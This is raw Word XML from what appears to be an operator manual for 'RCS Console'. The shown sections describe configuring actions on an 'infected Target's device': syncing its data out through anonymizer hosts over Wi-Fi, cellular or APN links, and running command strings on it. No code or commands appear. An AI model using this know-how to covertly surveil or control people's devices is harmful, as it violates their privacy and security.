          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Subactions</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a list of Actions that you want to execute - one by one - in the specified order.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRPr="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Host</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the address of the host - chosen from the list of available Anonymizers - that will be used as first hop from infected Target’s device, for data synchronization.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRPr="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0033183C" w:rsidRPr="00C50CE7" w:rsidRDefault="0033183C" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stop on success</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] specifies to prevent the execution of all subsequent Subactions.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRPr="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="0033183C" w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00357942">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">specifies </w:t>
            </w:r>
            <w:r w:rsidR="003C3773">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>if the synchronization will be performed through Internet connection or APN.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRPr="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="0033183C" w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Force Wifi</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="003C3773">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>forces a Wi</w:t>
            </w:r>
            <w:r w:rsidR="008E44B2">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="003C3773">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Fi data connection with any opened or preset Wi</w:t>
            </w:r>
            <w:r w:rsidR="008E44B2">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="003C3773">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Fi network available before starting synchronization.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRPr="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="0033183C" w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Force Cell</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00C4027E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>forces a GPRS/UMTS/3G data connection with the mobile operator before starting synchronization.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRPr="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRPr="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00463EA1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the APN hostname</w:t>
            </w:r>
            <w:r w:rsidR="0094552E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="00463EA1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> available only if [ </w:t>
            </w:r>
            <w:r w:rsidR="00463EA1" w:rsidRPr="00463EA1">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidR="00463EA1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] = APN.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRPr="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRPr="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>User</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00463EA1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is the APN user, available only if [ </w:t>
            </w:r>
            <w:r w:rsidR="00463EA1" w:rsidRPr="00463EA1">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidR="00463EA1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] = APN.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRPr="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00463EA1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Password</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00463EA1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is the APN password, available only if [ </w:t>
            </w:r>
            <w:r w:rsidR="00463EA1" w:rsidRPr="00463EA1">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidR="00463EA1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] = APN.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>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5F512E" w:rsidTr="00BE54A7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRDefault="00732ABF" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.16</w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00A52C9B" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">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(Execute)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1215" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:186pt;z-index:251811840;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId128" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1215" DrawAspect="Content" ObjectID="_1446455387" r:id="rId281"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Action’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRPr="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Subactions</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a list of Actions that you want to execute - one by one - in the specified order.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRPr="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Command</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the command string to be executed on the infected Target’s de</w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>vice.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>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5F512E" w:rsidTr="00BE54A7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C50CE7" w:rsidRPr="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRPr="00C50CE7" w:rsidRDefault="00732ABF" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.17</w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7" w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> [ RCS Console ] Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7" w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Operation #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00A52C9B" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># Target # </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
